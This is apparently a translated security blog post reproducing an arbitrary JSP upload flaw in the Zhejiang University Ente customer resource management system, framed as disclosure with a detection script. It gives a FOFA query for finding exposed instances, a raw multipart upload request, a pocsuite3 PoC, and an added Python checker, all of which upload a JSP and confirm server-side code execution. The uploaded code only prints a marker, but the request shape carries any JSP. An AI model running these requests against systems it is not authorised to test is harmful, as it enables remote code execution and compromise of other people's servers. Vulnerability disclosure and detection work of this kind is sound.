Vulnerability reproduction - Zhejiang University Ente customer resource management system CustomerAction.entphone;.js interface arbitrary file upload vulnerability (with detection script)

Disclaimer

The vulnerability described in this article has been fixed, and sensitive information has been redacted at several levels. The article is shared for educational purposes only; unauthorized attacks are illegal. Any direct or indirect consequences or losses arising from the dissemination or use of the information in this article are the responsibility of the user, and the author accepts no liability for them.

Vulnerability description

Zhejiang University Ente customer resource management system is a software product for enterprise customer resource management, designed to help companies manage and make use of customer resources and improve sales and marketing results. The system's CustomerAction.entphone;.js interface (method=loadFile) accepts multipart file uploads without restricting the file extension, so an attacker can upload an arbitrary JSP file, which is then stored under a web-accessible path and returned in the response. Requesting the stored JSP causes the server to execute it, which can lead to remote code execution and full compromise of the system.

FOFA query

title="欢迎使用浙大恩特客户资源管理系统"

POC and detection

POST /entsoft/CustomerAction.entphone;.js?method=loadFile HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarye8FPHsIAq9JN8j2A

------WebKitFormBoundarye8FPHsIAq9JN8j2A
Content-Disposition: form-data; name="file";filename="test.jsp"
Content-Type: image/jpeg

<%out.print("test");%>
------WebKitFormBoundarye8FPHsIAq9JN8j2A--

If the upload succeeds, the response is a JSON object whose filepath field gives the server-side path of the stored file; appending that path to the site's base URL yields the URL at which the uploaded file can be requested. If the JSP is executed rather than served as static text, the body of that request contains only the string test, without the surrounding JSP source.

PoC script

Written for the pocsuite3 framework.

# _*_ coding:utf-8 _*_
# @Time : 2023/12/15
# @Author: 炼金术师诸葛亮
from pocsuite3.api import POCBase, register_poc, requests, logger, random_str


class zhedaente_upload(POCBase):
    pocDesc = '''Zhejiang University Ente customer resource management system CustomerAction.entphone;.js file upload vulnerability'''
    author = '炼金术师诸葛亮'
    createDate = '2023-12-15'
    name = 'Zhejiang University Ente customer resource management system CustomerAction.entphone;.js file upload vulnerability'

    def _verify(self):
        result = {}
        path = '/entsoft/CustomerAction.entphone;.js?method=loadFile'
        url = self.url.rstrip('/') + path
        boundary = '----WebKitFormBoundarye8FPHsIAq9JN8j2A'

        headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/112.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
            'Accept-Encoding': 'gzip, deflate',
            'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
            'Connection': 'close',
        }
        post_headers = dict(headers, **{"Content-Type": "multipart/form-data; boundary=" + boundary})

        # Random file name and marker so a file left by an earlier run cannot
        # produce a false positive, and so the probe is not a fixed IoC.
        filename = random_str(8) + '.jsp'
        marker = random_str(12)
        data = (
            '--' + boundary + '\r\n'
            'Content-Disposition: form-data; name="file"; filename="' + filename + '"\r\n'
            'Content-Type: image/jpeg\r\n\r\n'
            '<%out.print("' + marker + '");%>\r\n'
            '--' + boundary + '--'
        )

        try:
            response = requests.post(url, headers=post_headers, data=data, verify=False, timeout=10)
            if response.status_code == 200:
                # The server answers with JSON containing the stored file's path.
                filepath = response.json().get('filepath')
                if filepath:
                    check_path = self.url.rstrip('/') + '/' + filepath.lstrip('/')
                    check_response = requests.get(check_path, headers=headers, verify=False, timeout=10)
                    if check_response.status_code == 200 and marker in check_response.text:
                        result['VerifyInfo'] = {}
                        result['VerifyInfo']['URL'] = url
                        result['VerifyInfo']['UploadedFile'] = check_path
        except Exception as e:
            logger.error(str(e))

        return self.parse_output(result)


register_poc(zhedaente_upload)
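The same check written without the pocsuite3 dependency, as an added example that is not part of the original post or of the vendor's code. It keeps the request shape of the PoC above but uses a random file name and marker, refuses a returned filepath that would point the follow-up request at a different host (the path comes from an untrusted response), and separates "the file was stored" from "the JSP ran": if the body that comes back still contains the out.print source, the server saved the upload but served it as static text, which is still an arbitrary file upload but not yet code execution. The HTTP transports are injected so the logic runs offline; the live-run stub at the bottom uses the requests library and takes the target base URL from the command line, both of which are assumptions of this example rather than something the post specifies.

```python
import json
import secrets
from dataclasses import dataclass
from urllib.parse import urljoin, urlsplit

# Upload endpoint, copied from the PoC request in the post.
UPLOAD_PATH = "/entsoft/CustomerAction.entphone;.js?method=loadFile"


@dataclass
class Verdict:
    uploaded: bool          # a filepath came back and the file is reachable
    executed: bool          # the marker rendered without JSP source: the code ran
    file_url: str = ""
    detail: str = ""


def build_multipart(filename, content, boundary, field="file"):
    """Build a multipart/form-data body with the same shape as the PoC request."""
    body = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        "Content-Type: image/jpeg\r\n"
        "\r\n"
        f"{content}\r\n"
        f"--{boundary}--\r\n"
    )
    return body.encode()


def resolve_filepath(base_url, filepath):
    """Join the returned filepath to the target origin.

    The path comes from an untrusted response, so refuse anything that would
    send the follow-up GET to another host (absolute or protocol-relative URLs).
    """
    target = urljoin(base_url.rstrip("/") + "/", filepath)
    if urlsplit(target).netloc != urlsplit(base_url).netloc:
        raise ValueError(f"filepath {filepath!r} resolves off-host: {target}")
    return target


def check_upload(base_url, post, get):
    """Upload a JSP carrying a random marker, then fetch it back.

    post(url, headers, body) and get(url) are injected transports returning
    (status_code, body_text); this keeps the logic testable without a network.
    """
    marker = secrets.token_hex(8)
    boundary = "----WebKitFormBoundary" + secrets.token_hex(8)
    filename = secrets.token_hex(4) + ".jsp"
    payload = f'<%out.print("{marker}");%>'
    headers = {"Content-Type": f"multipart/form-data; boundary={boundary}"}

    status, text = post(base_url.rstrip("/") + UPLOAD_PATH, headers,
                        build_multipart(filename, payload, boundary))
    if status != 200:
        return Verdict(False, False, detail=f"upload returned HTTP {status}")
    try:
        filepath = json.loads(text).get("filepath")
    except (ValueError, AttributeError):
        return Verdict(False, False, detail="upload response is not a JSON object")
    if not filepath:
        return Verdict(False, False, detail="no filepath in upload response")

    file_url = resolve_filepath(base_url, filepath)
    status, text = get(file_url)
    if status != 200 or marker not in text:
        return Verdict(False, False, file_url, f"uploaded file not reachable (HTTP {status})")
    # A raw "out.print" in the body means the server stored the file but served
    # it as static text; the marker alone does not prove code execution.
    executed = "out.print" not in text
    return Verdict(True, executed, file_url,
                   "marker rendered by the JSP engine" if executed else "JSP source served verbatim")


if __name__ == "__main__":
    # Live run (assumed usage): python check.py http://target.example
    import sys
    import requests  # only needed for a live run

    def _post(url, headers, body):
        r = requests.post(url, headers=headers, data=body, verify=False, timeout=10)
        return r.status_code, r.text

    def _get(url):
        r = requests.get(url, verify=False, timeout=10)
        return r.status_code, r.text

    print(check_upload(sys.argv[1], _post, _get))
```

Treat a Verdict with uploaded=True and executed=False as a confirmed arbitrary upload that still needs a second look (the file may sit under a path the container does not compile, or the server may be returning cached content); only uploaded=True with executed=True demonstrates code execution.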

Running the script


Source: blog.csdn.net/jjjj1029056414/article/details/135015136